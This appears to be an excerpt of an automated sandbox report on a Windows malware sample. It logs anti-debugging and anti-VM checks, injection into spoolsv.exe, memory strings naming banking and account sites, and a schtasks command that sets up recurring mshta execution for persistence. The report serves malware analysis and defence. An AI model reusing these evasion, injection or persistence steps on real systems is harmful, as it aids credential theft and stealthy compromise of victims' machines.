                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0097698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 34_2_0097698F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0096D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 34_2_0096D076
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0096D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 34_2_0096D3A9
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00979642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 34_2_00979642
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0097979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 34_2_0097979D
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00979B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 34_2_00979B2B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00975C97 FindFirstFileW,FindNextFileW,FindClose, 34_2_00975C97
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 34_2_009042DE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Thread delayed: delay time: 922337203685477
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005906000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: 19be97887a.exe, 00000023.00000002.2114874783.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(`
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: mshta.exe, 0000000E.00000003.922518550.000001A7DE50E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                      Source: svchost.exe, 0000001A.00000002.2116855687.00000251C1C4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: powershell.exe, 0000000C.00000002.981367721.0000025659E58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:n
                      Source: svchost.exe, 0000001A.00000002.2116237958.00000251C1C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000015.00000002.2128901422.000002CF0FA54000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1832789599.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000002.2114874783.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1868750086.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1983640551.000001F914970000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: firefox.exe, 00000034.00000002.1988159515.000001F91E5B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                      Source: svchost.exe, 0000001A.00000002.2117970284.00000251C1D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000015.00000002.2121204148.000002CF0A413000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWHp
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: svchost.exe, 0000001A.00000002.2116855687.00000251C1C4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: spoolsv.exe, 0000001F.00000002.2110936562.0000000000868000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2028261198.000000000087C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                      Source: bb5ad48269.exe, 00000036.00000002.1992251677.000000000172B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: rapes.exe, rapes.exe, 0000001C.00000002.2112228521.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, bb5ad48269.exe, bb5ad48269.exe, 00000021.00000002.1814569773.0000000001286000.00000040.00000001.01000000.00000013.sdmp, 19be97887a.exe, 00000023.00000002.2122777341.000000000100D000.00000040.00000001.01000000.00000012.sdmp, ab5415a7b5.exe, 00000035.00000002.2094934994.0000000000E9F000.00000040.00000001.01000000.00000017.sdmp, bb5ad48269.exe, 00000036.00000002.1990503385.0000000001286000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: bb5ad48269.exe, 00000021.00000002.1815098400.00000000016FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ?
                      Source: svchost.exe, 00000015.00000002.2121398677.000002CF0A42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@B
                      Source: powershell.exe, 0000000F.00000002.1057945331.0000024DF889A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F9149A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: mshta.exe, 0000000B.00000003.902320000.0000028CE511C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\O
                      Source: bb5ad48269.exe, 00000036.00000002.1992251677.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarey
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: powershell.exe, 0000000C.00000002.981367721.0000025659E39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\on
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: svchost.exe, 0000001A.00000002.2116237958.00000251C1C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: svchost.exe, 0000001A.00000002.2117239912.00000251C1C64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
                      Source: powershell.exe, 0000000C.00000002.981367721.0000025659DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: svchost.exe, 0000001A.00000002.2117239912.00000251C1C7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-9
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: svchost.exe, 0000001A.00000002.2114846614.00000251C1C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1983640551.000001F9149A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000002.993690562.00000000004F5000.00000040.00000001.01000000.0000000A.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000002.1009569593.00000000004F5000.00000040.00000001.01000000.0000000A.sdmp, rapes.exe, 00000013.00000002.1011070809.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, rapes.exe, 00000014.00000002.1028263597.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, rapes.exe, 0000001C.00000002.2112228521.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, bb5ad48269.exe, 00000021.00000002.1814569773.0000000001286000.00000040.00000001.01000000.00000013.sdmp, 19be97887a.exe, 00000023.00000002.2122777341.000000000100D000.00000040.00000001.01000000.00000012.sdmp, ab5415a7b5.exe, 00000035.00000002.2094934994.0000000000E9F000.00000040.00000001.01000000.00000017.sdmp, bb5ad48269.exe, 00000036.00000002.1990503385.0000000001286000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 19be97887a.exe, 0000001E.00000003.1832789599.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | File opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | File opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | File opened: SIWVID
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Code function: 17_2_05090562 rdtsc 17_2_05090562
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637AB21D4 LdrLoadDll,29_2_0000017637AB21D4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0097EAA2 BlockInput,34_2_0097EAA2
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA22D0 GetTickCount64,SetLastError,DeviceIoControl,IsDebuggerPresent,29_2_00007FF7C9CA22D0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,34_2_009042DE
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_0045DB60 mov eax, dword ptr fs:[00000030h]28_2_0045DB60
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00465FF2 mov eax, dword ptr fs:[00000030h]28_2_00465FF2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00924CE8 mov eax, dword ptr fs:[00000030h]34_2_00924CE8
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CAC564 GetProcessHeap,29_2_00007FF7C9CAC564
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\spoolsv.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA5F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00007FF7C9CA5F0C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA6570 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7C9CA6570
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA937C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7C9CA937C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA6748 SetUnhandledExceptionFilter,29_2_00007FF7C9CA6748
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00932622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00932622
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0092083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0092083F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009209D5 SetUnhandledExceptionFilter,34_2_009209D5
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00920C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00920C21
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Memory protected: page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi64_4764.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi64_5884.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4764, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 6960, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 15A0000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 15A2264
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeNtAllocateVirtualMemory: Indirect: 0x17637AB2C74
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMemory written: C:\Windows\System32\spoolsv.exe base: 15A0000 value starts with: 4D5A
                      Source: C:\Windows\System32\spoolsv.exeThread register set: target process: 7536
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMemory written: C:\Windows\System32\spoolsv.exe base: 15A0000
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00961201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,34_2_00961201
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00438700 ShellExecuteA,Sleep,CreateThread,Sleep,28_2_00438700
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096B226 SendInput,keybd_event,34_2_0096B226
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,34_2_009822DA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\mtzRdqIHD.hta"Jump to behavior
